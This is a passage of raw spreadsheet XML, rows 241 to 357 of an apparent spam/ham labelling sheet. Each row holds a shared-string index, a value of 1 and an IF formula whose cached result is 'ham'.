      <c r="A241" t="s">
        <v>176</v>
      </c>
      <c r="B241">
        <v>1</v>
      </c>
      <c r="C241" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A242" t="s">
        <v>21</v>
      </c>
      <c r="B242">
        <v>1</v>
      </c>
      <c r="C242" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A243" t="s">
        <v>177</v>
      </c>
      <c r="B243">
        <v>1</v>
      </c>
      <c r="C243" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A244" t="s">
        <v>178</v>
      </c>
      <c r="B244">
        <v>1</v>
      </c>
      <c r="C244" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A245" t="s">
        <v>179</v>
      </c>
      <c r="B245">
        <v>1</v>
      </c>
      <c r="C245" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A246" t="s">
        <v>180</v>
      </c>
      <c r="B246">
        <v>1</v>
      </c>
      <c r="C246" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A247" t="s">
        <v>181</v>
      </c>
      <c r="B247">
        <v>1</v>
      </c>
      <c r="C247" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A248" t="s">
        <v>182</v>
      </c>
      <c r="B248">
        <v>1</v>
      </c>
      <c r="C248" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A249" t="s">
        <v>21</v>
      </c>
      <c r="B249">
        <v>1</v>
      </c>
      <c r="C249" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A250" t="s">
        <v>183</v>
      </c>
      <c r="B250">
        <v>1</v>
      </c>
      <c r="C250" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A251" t="s">
        <v>184</v>
      </c>
      <c r="B251">
        <v>1</v>
      </c>
      <c r="C251" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A252" t="s">
        <v>150</v>
      </c>
      <c r="B252">
        <v>1</v>
      </c>
      <c r="C252" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A253" t="s">
        <v>21</v>
      </c>
      <c r="B253">
        <v>1</v>
      </c>
      <c r="C253" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A254" t="s">
        <v>185</v>
      </c>
      <c r="B254">
        <v>1</v>
      </c>
      <c r="C254" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A255" t="s">
        <v>186</v>
      </c>
      <c r="B255">
        <v>1</v>
      </c>
      <c r="C255" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A256" t="s">
        <v>187</v>
      </c>
      <c r="B256">
        <v>1</v>
      </c>
      <c r="C256" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A257" t="s">
        <v>21</v>
      </c>
      <c r="B257">
        <v>1</v>
      </c>
      <c r="C257" t="str">
        <f t="shared" si="3"/>
        <v>ham</v>
      </c>
    </row>
    <row r="258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A258" t="s">
        <v>188</v>
      </c>
      <c r="B258">
        <v>1</v>
      </c>
      <c r="C258" t="str">
        <f t="shared" ref="C258:C321" si="4">IF(B258="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A259" t="s">
        <v>189</v>
      </c>
      <c r="B259">
        <v>1</v>
      </c>
      <c r="C259" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A260" t="s">
        <v>190</v>
      </c>
      <c r="B260">
        <v>1</v>
      </c>
      <c r="C260" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A261" t="s">
        <v>21</v>
      </c>
      <c r="B261">
        <v>1</v>
      </c>
      <c r="C261" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A262" t="s">
        <v>21</v>
      </c>
      <c r="B262">
        <v>1</v>
      </c>
      <c r="C262" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A263" t="s">
        <v>21</v>
      </c>
      <c r="B263">
        <v>1</v>
      </c>
      <c r="C263" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A264" t="s">
        <v>191</v>
      </c>
      <c r="B264">
        <v>1</v>
      </c>
      <c r="C264" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A265" t="s">
        <v>21</v>
      </c>
      <c r="B265">
        <v>1</v>
      </c>
      <c r="C265" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A266" t="s">
        <v>21</v>
      </c>
      <c r="B266">
        <v>1</v>
      </c>
      <c r="C266" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A267" t="s">
        <v>192</v>
      </c>
      <c r="B267">
        <v>1</v>
      </c>
      <c r="C267" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A268" t="s">
        <v>193</v>
      </c>
      <c r="B268">
        <v>1</v>
      </c>
      <c r="C268" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A269" t="s">
        <v>194</v>
      </c>
      <c r="B269">
        <v>1</v>
      </c>
      <c r="C269" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A270" t="s">
        <v>21</v>
      </c>
      <c r="B270">
        <v>1</v>
      </c>
      <c r="C270" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A271" t="s">
        <v>195</v>
      </c>
      <c r="B271">
        <v>1</v>
      </c>
      <c r="C271" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A272" t="s">
        <v>21</v>
      </c>
      <c r="B272">
        <v>1</v>
      </c>
      <c r="C272" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A273" t="s">
        <v>196</v>
      </c>
      <c r="B273">
        <v>1</v>
      </c>
      <c r="C273" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A274" t="s">
        <v>21</v>
      </c>
      <c r="B274">
        <v>1</v>
      </c>
      <c r="C274" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A275" t="s">
        <v>83</v>
      </c>
      <c r="B275">
        <v>1</v>
      </c>
      <c r="C275" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A276" t="s">
        <v>21</v>
      </c>
      <c r="B276">
        <v>1</v>
      </c>
      <c r="C276" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A277" t="s">
        <v>197</v>
      </c>
      <c r="B277">
        <v>1</v>
      </c>
      <c r="C277" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A278" t="s">
        <v>198</v>
      </c>
      <c r="B278">
        <v>1</v>
      </c>
      <c r="C278" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A279" t="s">
        <v>199</v>
      </c>
      <c r="B279">
        <v>1</v>
      </c>
      <c r="C279" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A280" t="s">
        <v>200</v>
      </c>
      <c r="B280">
        <v>1</v>
      </c>
      <c r="C280" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A281" t="s">
        <v>201</v>
      </c>
      <c r="B281">
        <v>1</v>
      </c>
      <c r="C281" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A282" t="s">
        <v>202</v>
      </c>
      <c r="B282">
        <v>1</v>
      </c>
      <c r="C282" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A283" t="s">
        <v>203</v>
      </c>
      <c r="B283">
        <v>1</v>
      </c>
      <c r="C283" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A284" t="s">
        <v>21</v>
      </c>
      <c r="B284">
        <v>1</v>
      </c>
      <c r="C284" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A285" t="s">
        <v>204</v>
      </c>
      <c r="B285">
        <v>1</v>
      </c>
      <c r="C285" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A286" t="s">
        <v>205</v>
      </c>
      <c r="B286">
        <v>1</v>
      </c>
      <c r="C286" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A287" t="s">
        <v>206</v>
      </c>
      <c r="B287">
        <v>1</v>
      </c>
      <c r="C287" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A288" t="s">
        <v>21</v>
      </c>
      <c r="B288">
        <v>1</v>
      </c>
      <c r="C288" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A289" t="s">
        <v>207</v>
      </c>
      <c r="B289">
        <v>1</v>
      </c>
      <c r="C289" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A290" t="s">
        <v>208</v>
      </c>
      <c r="B290">
        <v>1</v>
      </c>
      <c r="C290" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A291" t="s">
        <v>209</v>
      </c>
      <c r="B291">
        <v>1</v>
      </c>
      <c r="C291" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A292" t="s">
        <v>21</v>
      </c>
      <c r="B292">
        <v>1</v>
      </c>
      <c r="C292" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A293" t="s">
        <v>210</v>
      </c>
      <c r="B293">
        <v>1</v>
      </c>
      <c r="C293" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A294" t="s">
        <v>21</v>
      </c>
      <c r="B294">
        <v>1</v>
      </c>
      <c r="C294" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A295" t="s">
        <v>211</v>
      </c>
      <c r="B295">
        <v>1</v>
      </c>
      <c r="C295" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A296" t="s">
        <v>212</v>
      </c>
      <c r="B296">
        <v>1</v>
      </c>
      <c r="C296" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A297" t="s">
        <v>213</v>
      </c>
      <c r="B297">
        <v>1</v>
      </c>
      <c r="C297" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A298" t="s">
        <v>213</v>
      </c>
      <c r="B298">
        <v>1</v>
      </c>
      <c r="C298" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A299" t="s">
        <v>21</v>
      </c>
      <c r="B299">
        <v>1</v>
      </c>
      <c r="C299" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A300" t="s">
        <v>21</v>
      </c>
      <c r="B300">
        <v>1</v>
      </c>
      <c r="C300" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A301" t="s">
        <v>214</v>
      </c>
      <c r="B301">
        <v>1</v>
      </c>
      <c r="C301" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A302" t="s">
        <v>215</v>
      </c>
      <c r="B302">
        <v>1</v>
      </c>
      <c r="C302" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A303" t="s">
        <v>216</v>
      </c>
      <c r="B303">
        <v>1</v>
      </c>
      <c r="C303" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A304" t="s">
        <v>21</v>
      </c>
      <c r="B304">
        <v>1</v>
      </c>
      <c r="C304" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A305" t="s">
        <v>217</v>
      </c>
      <c r="B305">
        <v>1</v>
      </c>
      <c r="C305" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A306" t="s">
        <v>218</v>
      </c>
      <c r="B306">
        <v>1</v>
      </c>
      <c r="C306" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A307" t="s">
        <v>219</v>
      </c>
      <c r="B307">
        <v>1</v>
      </c>
      <c r="C307" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A308" t="s">
        <v>21</v>
      </c>
      <c r="B308">
        <v>1</v>
      </c>
      <c r="C308" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A309" t="s">
        <v>21</v>
      </c>
      <c r="B309">
        <v>1</v>
      </c>
      <c r="C309" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A310" t="s">
        <v>21</v>
      </c>
      <c r="B310">
        <v>1</v>
      </c>
      <c r="C310" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A311" t="s">
        <v>220</v>
      </c>
      <c r="B311">
        <v>1</v>
      </c>
      <c r="C311" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A312" t="s">
        <v>21</v>
      </c>
      <c r="B312">
        <v>1</v>
      </c>
      <c r="C312" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A313" t="s">
        <v>221</v>
      </c>
      <c r="B313">
        <v>1</v>
      </c>
      <c r="C313" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A314" t="s">
        <v>21</v>
      </c>
      <c r="B314">
        <v>1</v>
      </c>
      <c r="C314" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A315" t="s">
        <v>222</v>
      </c>
      <c r="B315">
        <v>1</v>
      </c>
      <c r="C315" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A316" t="s">
        <v>21</v>
      </c>
      <c r="B316">
        <v>1</v>
      </c>
      <c r="C316" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A317" t="s">
        <v>223</v>
      </c>
      <c r="B317">
        <v>1</v>
      </c>
      <c r="C317" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A318" t="s">
        <v>224</v>
      </c>
      <c r="B318">
        <v>1</v>
      </c>
      <c r="C318" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A319" t="s">
        <v>225</v>
      </c>
      <c r="B319">
        <v>1</v>
      </c>
      <c r="C319" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A320" t="s">
        <v>21</v>
      </c>
      <c r="B320">
        <v>1</v>
      </c>
      <c r="C320" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A321" t="s">
        <v>226</v>
      </c>
      <c r="B321">
        <v>1</v>
      </c>
      <c r="C321" t="str">
        <f t="shared" si="4"/>
        <v>ham</v>
      </c>
    </row>
    <row r="322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A322" t="s">
        <v>227</v>
      </c>
      <c r="B322">
        <v>1</v>
      </c>
      <c r="C322" t="str">
        <f t="shared" ref="C322:C385" si="5">IF(B322="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A323" t="s">
        <v>228</v>
      </c>
      <c r="B323">
        <v>1</v>
      </c>
      <c r="C323" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A324" t="s">
        <v>229</v>
      </c>
      <c r="B324">
        <v>1</v>
      </c>
      <c r="C324" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A325" t="s">
        <v>230</v>
      </c>
      <c r="B325">
        <v>1</v>
      </c>
      <c r="C325" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A326" t="s">
        <v>231</v>
      </c>
      <c r="B326">
        <v>1</v>
      </c>
      <c r="C326" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A327" t="s">
        <v>231</v>
      </c>
      <c r="B327">
        <v>1</v>
      </c>
      <c r="C327" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A328" t="s">
        <v>231</v>
      </c>
      <c r="B328">
        <v>1</v>
      </c>
      <c r="C328" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A329" t="s">
        <v>232</v>
      </c>
      <c r="B329">
        <v>1</v>
      </c>
      <c r="C329" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A330" t="s">
        <v>233</v>
      </c>
      <c r="B330">
        <v>1</v>
      </c>
      <c r="C330" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A331" t="s">
        <v>21</v>
      </c>
      <c r="B331">
        <v>1</v>
      </c>
      <c r="C331" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A332" t="s">
        <v>234</v>
      </c>
      <c r="B332">
        <v>1</v>
      </c>
      <c r="C332" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A333" t="s">
        <v>21</v>
      </c>
      <c r="B333">
        <v>1</v>
      </c>
      <c r="C333" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A334" t="s">
        <v>21</v>
      </c>
      <c r="B334">
        <v>1</v>
      </c>
      <c r="C334" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A335" t="s">
        <v>21</v>
      </c>
      <c r="B335">
        <v>1</v>
      </c>
      <c r="C335" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A336" t="s">
        <v>21</v>
      </c>
      <c r="B336">
        <v>1</v>
      </c>
      <c r="C336" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A337" t="s">
        <v>235</v>
      </c>
      <c r="B337">
        <v>1</v>
      </c>
      <c r="C337" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A338" t="s">
        <v>236</v>
      </c>
      <c r="B338">
        <v>1</v>
      </c>
      <c r="C338" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A339" t="s">
        <v>21</v>
      </c>
      <c r="B339">
        <v>1</v>
      </c>
      <c r="C339" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A340" t="s">
        <v>21</v>
      </c>
      <c r="B340">
        <v>1</v>
      </c>
      <c r="C340" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A341" t="s">
        <v>21</v>
      </c>
      <c r="B341">
        <v>1</v>
      </c>
      <c r="C341" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A342" t="s">
        <v>21</v>
      </c>
      <c r="B342">
        <v>1</v>
      </c>
      <c r="C342" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A343" t="s">
        <v>237</v>
      </c>
      <c r="B343">
        <v>1</v>
      </c>
      <c r="C343" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A344" t="s">
        <v>238</v>
      </c>
      <c r="B344">
        <v>1</v>
      </c>
      <c r="C344" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A345" t="s">
        <v>21</v>
      </c>
      <c r="B345">
        <v>1</v>
      </c>
      <c r="C345" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A346" t="s">
        <v>239</v>
      </c>
      <c r="B346">
        <v>1</v>
      </c>
      <c r="C346" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A347" t="s">
        <v>240</v>
      </c>
      <c r="B347">
        <v>1</v>
      </c>
      <c r="C347" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A348" t="s">
        <v>241</v>
      </c>
      <c r="B348">
        <v>1</v>
      </c>
      <c r="C348" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A349" t="s">
        <v>242</v>
      </c>
      <c r="B349">
        <v>1</v>
      </c>
      <c r="C349" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A350" t="s">
        <v>243</v>
      </c>
      <c r="B350">
        <v>1</v>
      </c>
      <c r="C350" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A351" t="s">
        <v>244</v>
      </c>
      <c r="B351">
        <v>1</v>
      </c>
      <c r="C351" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A352" t="s">
        <v>245</v>
      </c>
      <c r="B352">
        <v>1</v>
      </c>
      <c r="C352" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A353" t="s">
        <v>21</v>
      </c>
      <c r="B353">
        <v>1</v>
      </c>
      <c r="C353" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A354" t="s">
        <v>246</v>
      </c>
      <c r="B354">
        <v>1</v>
      </c>
      <c r="C354" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A355" t="s">
        <v>247</v>
      </c>
      <c r="B355">
        <v>1</v>
      </c>
      <c r="C355" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A356" t="s">
        <v>248</v>
      </c>
      <c r="B356">
        <v>1</v>
      </c>
      <c r="C356" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
    <row r="357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A357" t="s">
        <v>249</v>
      </c>
      <c r="B357">
        <v>1</v>
      </c>
      <c r="C357" t="str">
        <f t="shared" si="5"/>
        <v>ham</v>
      </c>
    </row>
